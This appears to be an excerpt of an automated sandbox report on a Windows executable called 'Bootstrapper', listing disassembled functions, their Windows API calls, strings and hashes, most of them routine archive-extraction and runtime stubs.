Instruction ID: a4c87a815b901d1fb802d980d1f5ea1cf3033e0ec6d6dbb43329d6873d20729d
Opcode Fuzzy Hash: afa25b056d61dc760142f3aaceab61eecd469b0242bd6517a7d731e8d610db0a
Instruction Fuzzy Hash: 67B092F1298110AC2148A1142907CB60248C4C0B20330B12ABC14F1281D84088890533

Function 00E1E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cba995bf158e59b3b51b3e27d417d2c1a5f57f2303ac5619273b1438e573a42c
Instruction ID: 898954d349dadbd26a3693e8197138de0fa712368a59a28cffc40132d05e8ba8
Opcode Fuzzy Hash: cba995bf158e59b3b51b3e27d417d2c1a5f57f2303ac5619273b1438e573a42c
Instruction Fuzzy Hash: 61B012F129C110FC314CA1142C07CF7024CC4C0F10330B02EFC14F1281D8408E890533

Function 00E1E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: eb39739c0b2165ce6d97719406fd63e72923ec65a341c04872ed16854f664d7c
Instruction ID: 46f513f8a0b9d84e365e8314d3d04e6298f722d847efdef6de83df1e307c19b6
Opcode Fuzzy Hash: eb39739c0b2165ce6d97719406fd63e72923ec65a341c04872ed16854f664d7c
Instruction Fuzzy Hash: 39B092F1298110BC214861142A07CF60248C4C0B20330B12AB914F12819840488A0533

Function 00E1E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fe320ae9bf8f439a1eac6d2499f00cf61490dddceb5470da522d416ef694b9cd
Instruction ID: cb5887004c29de5d04513888125001b4763701d6a4e54a6a2abb7965117b3bb8
Opcode Fuzzy Hash: fe320ae9bf8f439a1eac6d2499f00cf61490dddceb5470da522d416ef694b9cd
Instruction Fuzzy Hash: 1BA011F22A8222BC300C22002C0BCFB020CC8C0F20330B02EFC20B0280AC8008820833

Function 00E1E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e9f7d56abe67e56c37563b435cf347e110b710f695a2d318d4667282646bc3a6
Instruction ID: a6089b6a95a2746bee86c72bc95e0b1de7b2b98b1252e16971428dc1e9ebdd17
Opcode Fuzzy Hash: e9f7d56abe67e56c37563b435cf347e110b710f695a2d318d4667282646bc3a6
Instruction Fuzzy Hash: 83A011F22AC222BC300C22002C0BCFB020CC8C0F20330B82EFC22B0280A88008820833

Function 00E1E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1ab792d9324a7ea0b1feb0ca0e80e7f7ffda205a0fddd7c9e9d4da00eefc9c27
Instruction ID: a6089b6a95a2746bee86c72bc95e0b1de7b2b98b1252e16971428dc1e9ebdd17
Opcode Fuzzy Hash: 1ab792d9324a7ea0b1feb0ca0e80e7f7ffda205a0fddd7c9e9d4da00eefc9c27
Instruction Fuzzy Hash: 83A011F22AC222BC300C22002C0BCFB020CC8C0F20330B82EFC22B0280A88008820833

Function 00E1E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 80ec9d718883dff5c7a8ff040809229b8a7fe0e21e38f2f59f61c7791190dc5c
Instruction ID: a6089b6a95a2746bee86c72bc95e0b1de7b2b98b1252e16971428dc1e9ebdd17
Opcode Fuzzy Hash: 80ec9d718883dff5c7a8ff040809229b8a7fe0e21e38f2f59f61c7791190dc5c
Instruction Fuzzy Hash: 83A011F22AC222BC300C22002C0BCFB020CC8C0F20330B82EFC22B0280A88008820833

Function 00E1E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b7d6388a3f7dee9f3056a63097eb5c041b6c98ed0bdc8e1a0ae31b2633119440
Instruction ID: a6089b6a95a2746bee86c72bc95e0b1de7b2b98b1252e16971428dc1e9ebdd17
Opcode Fuzzy Hash: b7d6388a3f7dee9f3056a63097eb5c041b6c98ed0bdc8e1a0ae31b2633119440
Instruction Fuzzy Hash: 83A011F22AC222BC300C22002C0BCFB020CC8C0F20330B82EFC22B0280A88008820833

Function 00E1E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e5172f0ed88e13d81c8988ff256fc7c744694572fd70a7920fc2d9503281c12e
Instruction ID: a6089b6a95a2746bee86c72bc95e0b1de7b2b98b1252e16971428dc1e9ebdd17
Opcode Fuzzy Hash: e5172f0ed88e13d81c8988ff256fc7c744694572fd70a7920fc2d9503281c12e
Instruction Fuzzy Hash: 83A011F22AC222BC300C22002C0BCFB020CC8C0F20330B82EFC22B0280A88008820833

Function 00E09F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00E0903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00E09F0C

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: cd4b2ab505be873e8e249cee81c53daf59005ed429b29687ae04149ef9debceb
Instruction ID: c165020775bf0390ac910c4682cd31dc9fb240d2b93b248547b10d5ea50c4bbd
Opcode Fuzzy Hash: cd4b2ab505be873e8e249cee81c53daf59005ed429b29687ae04149ef9debceb
Instruction Fuzzy Hash: 89A0113008800E8AAE002B32CA0880C3B20EB20BC030002A8A00ACA0A2CB2A880B8A00

Function 00E1AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00E1AE72,C:\Users\user\Desktop,00000000,00E4946A,00000006), ref: 00E1AC08

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 9d690511e471daac836db672f7f5c9365c5263e676397cc061cf79624cb3c740
Instruction ID: bf904c90a37a342e33e448849be7f85600575a6b0ddb3d0faaf768503f34cb64
Opcode Fuzzy Hash: 9d690511e471daac836db672f7f5c9365c5263e676397cc061cf79624cb3c740
Instruction Fuzzy Hash: D2A011302022008B82000B328F0AA0EBAAAAFA2B20F00C028A00080030CB30C820AA00

Function 00E09620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,00E095D6,?,?,?,?,?,00E32641,000000FF), ref: 00E0963B

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ed4950cf30c98a90068e0da1bd35cf613d173ebe6bac0956653e3b0fc9de4ebb
Instruction ID: 3270c55f92402b4105fd1a4538bcd3fd6fc6380c4ff7244a2fc2d3165f1c7fc9
Opcode Fuzzy Hash: ed4950cf30c98a90068e0da1bd35cf613d173ebe6bac0956653e3b0fc9de4ebb
Instruction Fuzzy Hash: CEF082704C1B159FDB308E74E458B92B7E8AB12329F042B1ED0E6629E2D77269CD8A40

Non-executed Functions

Function 00E1C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00E1C2B1
EndDialog.USER32(?,00000006), ref: 00E1C2C4
GetDlgItem.USER32(?,0000006C), ref: 00E1C2E0
SetFocus.USER32(00000000), ref: 00E1C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00E1C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00E1C358
FindFirstFileW.KERNEL32(?,?), ref: 00E1C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E1C38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00E1C39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E1C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E1C3D4
_swprintf.LIBCMT ref: 00E1C404

Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00E1C417
FindClose.KERNEL32(00000000), ref: 00E1C41E
_swprintf.LIBCMT ref: 00E1C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 00E1C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00E1C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00E1C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00E1C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E1C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E1C509
_swprintf.LIBCMT ref: 00E1C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00E1C548
_swprintf.LIBCMT ref: 00E1C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00E1C5AF

Part of subcall function 00E1AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E1AF35
Part of subcall function 00E1AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00E3E72C,?,?), ref: 00E1AF84

Strings

P, xrefs: 00E1C342
%s %s %s, xrefs: 00E1C3F2, 00E1C527
%s %s, xrefs: 00E1C469, 00E1C58E
REPLACEFILEDLG, xrefs: 00E1C247

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$P$REPLACEFILEDLG
API String ID: 797121971-530609767
Opcode ID: b102a6f4607e0a402055d4bc427e5c3b4c49a0fbd5516e719fa591d39bad0146
Instruction ID: 14f4aa4abdb0ff0cb1e491cd64567cb88bce1272a20697bbb45b1312df671593
Opcode Fuzzy Hash: b102a6f4607e0a402055d4bc427e5c3b4c49a0fbd5516e719fa591d39bad0146
Instruction Fuzzy Hash: 8591C4B2148348BFD2219BB0DC49FFB7BECEB4A704F045819F745E2091D775AA488B62

Function 00E06FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E06FAA
_wcslen.LIBCMT ref: 00E07013
_wcslen.LIBCMT ref: 00E07084

Part of subcall function 00E07A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E07AAB
Part of subcall function 00E07A9C: GetLastError.KERNEL32 ref: 00E07AF1
Part of subcall function 00E07A9C: CloseHandle.KERNEL32(?), ref: 00E07B00

Part of subcall function 00E0A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00E0977F,?,?,00E095CF,?,?,?,?,?,00E32641,000000FF), ref: 00E0A1F1
Part of subcall function 00E0A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E0977F,?,?,00E095CF,?,?,?,?,?,00E32641), ref: 00E0A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00E07139
CloseHandle.KERNEL32(00000000), ref: 00E07155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00E07298

Part of subcall function 00E09DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00E073BC,?,?,?,00000000), ref: 00E09DBC
Part of subcall function 00E09DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00E09E70

Part of subcall function 00E09620: CloseHandle.KERNELBASE(000000FF,?,?,00E095D6,?,?,?,?,?,00E32641,000000FF), ref: 00E0963B

Part of subcall function 00E0A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A501
Part of subcall function 00E0A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A532

Strings

UNC\, xrefs: 00E07051
\??\, xrefs: 00E0702B
SeCreateSymbolicLinkPrivilege, xrefs: 00E06FCC
SeRestorePrivilege, xrefs: 00E06FC2

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: 0f42d919671921ecc00fc0beb46da6d8b9199832e80fd3351317547a94fe00ba
Instruction ID: 57c45f559a649b27a2abf1536a8d9a35f4a0bbd9af8c28acbdb9cd4c9e11aab6
Opcode Fuzzy Hash: 0f42d919671921ecc00fc0beb46da6d8b9199832e80fd3351317547a94fe00ba
Instruction Fuzzy Hash: C9C1D271D04248AAEB24DB74DC85FEEB7A8AF04304F00555AF996F71C2D774BAC88B61

Function 00E1E6A3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,,0000001C,00E1E7DD,00000000,?,?,?,?,?,?,?,00E1E5E8,00000004,00E61CEC,00E1E86D), ref: 00E1E6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00E1E5E8,00000004,00E61CEC,00E1E86D), ref: 00E1E6CF

Strings

, xrefs: 00E1E6AB, 00E1E6B0
D, xrefs: 00E1E6C3

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D$
API String ID: 401686933-250975860
Opcode ID: 524e1766fdb506fcd02d5130fff078f3e03003d03e1f914186be9f05ef4eed9a
Instruction ID: ca3e9a7354925f68a956f82ebef5be5454a09a6eba3bb98053d6a90ba0309e16
Opcode Fuzzy Hash: 524e1766fdb506fcd02d5130fff078f3e03003d03e1f914186be9f05ef4eed9a
Instruction Fuzzy Hash: 2501F7326001096BDB14DE29DC09BED7BAAAFC4328F0CC121FD19E7250D738D9458680

Function 00E1F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E1F844
IsDebuggerPresent.KERNEL32 ref: 00E1F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E1F930
UnhandledExceptionFilter.KERNEL32(?), ref: 00E1F93A

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
